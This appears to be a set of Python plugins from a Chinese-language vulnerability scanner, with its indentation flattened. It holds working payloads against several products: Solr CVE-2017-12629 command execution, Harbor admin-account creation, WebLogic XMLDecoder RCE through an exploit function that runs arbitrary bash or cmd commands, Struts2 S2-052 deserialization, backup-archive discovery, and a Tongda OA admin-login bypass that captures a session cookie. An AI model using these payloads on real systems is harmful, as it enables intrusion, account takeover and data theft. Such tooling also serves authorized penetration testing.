data1 = '''{"add-listener":{"event":"postCommit","name":"''' + rm + '''","class":"solr.RunExecutableListener","exe":"ping","dir":"/usr/bin/","args":["''' + DL.dns_host(
) + '''"]}}'''
data2 = '''[{"id":"''' + rm + '''"}]'''
Headers2 = Headers
Headers2['Accept'] = 'application/json'
Headers2["Content-Type"] = "application/json"
#POC没问题DNSlog有问题
#DL="p61rpm.dnslog.cn"
resp = requests.post(payload_url,
data=data1,
headers=Headers,
proxies=proxies,
timeout=6,
verify=False)
resp2 = requests.post(payload_url2,
data=data2,
headers=Headers2,
proxies=proxies,
timeout=6,
verify=False)
time.sleep(3)
if DL.result():
Medusa = "{}存在Solr远程代码执行漏洞(CVE-2017-12629)\r\n 验证数据:\r\n漏洞位置:{}\r\n模板返回值:{}\r\n执行结果:{}\r\n".format(
url, payload_url, resp.text, resp2.text)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/api/users'
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'application/json',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
rm = "MedusaTextPoc1" + randoms().result(5) # 获取随机数
data = {
"username": rm,
"email": rm + "@qq.com",
"realname": rm,
"password": rm,
"comment": rm,
"has_admin_role": True
}
data2 = {
"username": rm,
"email": rm + "@qq.com",
"realname": rm,
"password": rm,
"comment": rm,
"has_admin_role": 1
}
data = json.dumps(data)
data2 = json.dumps(data2)
resp = requests.post(payload_url,
data=data,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
head = resp.headers.get("Location")
code = resp.status_code
if code == 400:
resp2 = requests.post(payload_url,
data=data2,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
head2 = resp2.headers.get("Location")
code2 = resp2.status_code
if code2 == 201 and head2.find("/api/users/") != -1:
Medusa = "{}存在Harbor任意管理员注册漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n账号:{}\r\n密码:{}\r\n注册账号数量:{}\r\n".format(
url, payload_url, rm, rm, head2)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
if code == 201 and head.find("/api/users/") != -1:
Medusa = "{}存在Harbor任意管理员注册漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n账号:{}\r\n密码:{}\r\n注册账号数量:{}\r\n".format(
url, payload_url, rm, rm, head)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
command = kwargs.get("Command")
linux_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>{}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(command)
windows_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>C:\Windows\System32\cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>{}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''.format(command)
for data in [linux_data, windows_data]:
try:
payload = '/wls-wsat/CoordinatorPortType'
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "text/xml",
}
resp = requests.post(payload_url,
headers=headers,
data=data,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
_t = VulnerabilityInfo(con)
Exploit(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
print(
"\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
)
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
" || Exploit", e) # 调用写入类传入URL和错误插件名
print(
"\033[32m[ + ] Command sent successfully, please refer to the returned data packet\033[0m"
)
print(
"\033[36m[ + ] Return packet:The vulnerability is command execution without echo\033[0m"
)
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
DL = Dnslog()
con = ""
data = """<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>ping</string>
<string>{}</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>""".format(DL.dns_host())
try:
payload_url = url
try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.post(payload_url,
headers=Headers,
data=data,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
except:
pass
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-052)\r\n漏洞详情:\r\n版本号:S2-052\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
url, data, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
suffixs = [".zip", ".rar", ".tar.gz", ".tgz", ".7z"]
payloads = [
"/www.root",
"/bbs",
"/www",
"/wwwroot",
"/web",
"/root",
"/database",
"/db",
"/website",
"/config_ucenter.php",
"/config_global.php",
"/1",
"/123",
"/a",
]
for payload in payloads:
for suffix in suffixs:
try:
payload_url = Url + payload + suffix
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and (resp.headers.get("Content-Type")
== "application/zip"
or resp.headers.get("Content-Type")
== "application/x-rar-compressed"
or resp.headers.get("Content-Type")
== "application/x-gzip"
or resp.headers.get("Content-Type")
== "application/gzip"):
Medusa = "{}存在敏感压缩文件下载漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
for suffix in suffixs: #域名加上后缀
try:
payload_url = Url + "/" + url + suffix
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and (
resp.headers.get("Content-Type") == "application/zip"
or resp.headers.get("Content-Type")
== "application/x-rar-compressed"
or resp.headers.get("Content-Type") == "application/x-gzip"
or resp.headers.get("Content-Type") == "application/gzip"):
Medusa = "{}存在敏感压缩文件下载漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/general/login_code.php'
payload_url = scheme + "://" + url + ":" + str(port) + payload
payload2 = '/logincheck_code.php'
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
payload3 = "/general/index.php"
payload_url3 = scheme + "://" + url + ":" + str(port) + payload3
res = requests.get(payload_url,
headers=Headers,
proxies=proxies,
timeout=6,
verify=False)
restext = str(res.text).split('{')
codeuid = restext[-1].replace('}"}', '').replace('\r\n', '')
resp = requests.post(payload_url2,
data={
'CODEUID': '{' + codeuid + '}',
'UID': int(1)
},
headers=Headers,
proxies=proxies,
timeout=6,
verify=False)
head = resp.headers.get('Set-Cookie').replace('path=/', '')
Headers["Cookie"] = head
resp2 = requests.get(payload_url3,
headers=Headers,
proxies=proxies,
timeout=6,
verify=False)
code = resp2.status_code
con = resp2.text
if code == 200 and (
con.find("""<li><a id="on_status_1" href="javascript:""") != -1
and con.find(
"""<a id="logout_btn" class="logout" href="javascript""")
!= -1) or (con.find("通达云市场") != -1
and con.find("通达OA在线帮助") != -1
and con.find("注销") != -1):
Medusa = "{}存在通达OA任意使用管理员账号登录漏洞\r\n验证数据:\r\n管理员COOKIE:{}\r\n漏洞返回页面:{}\r\n".format(
url, head, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类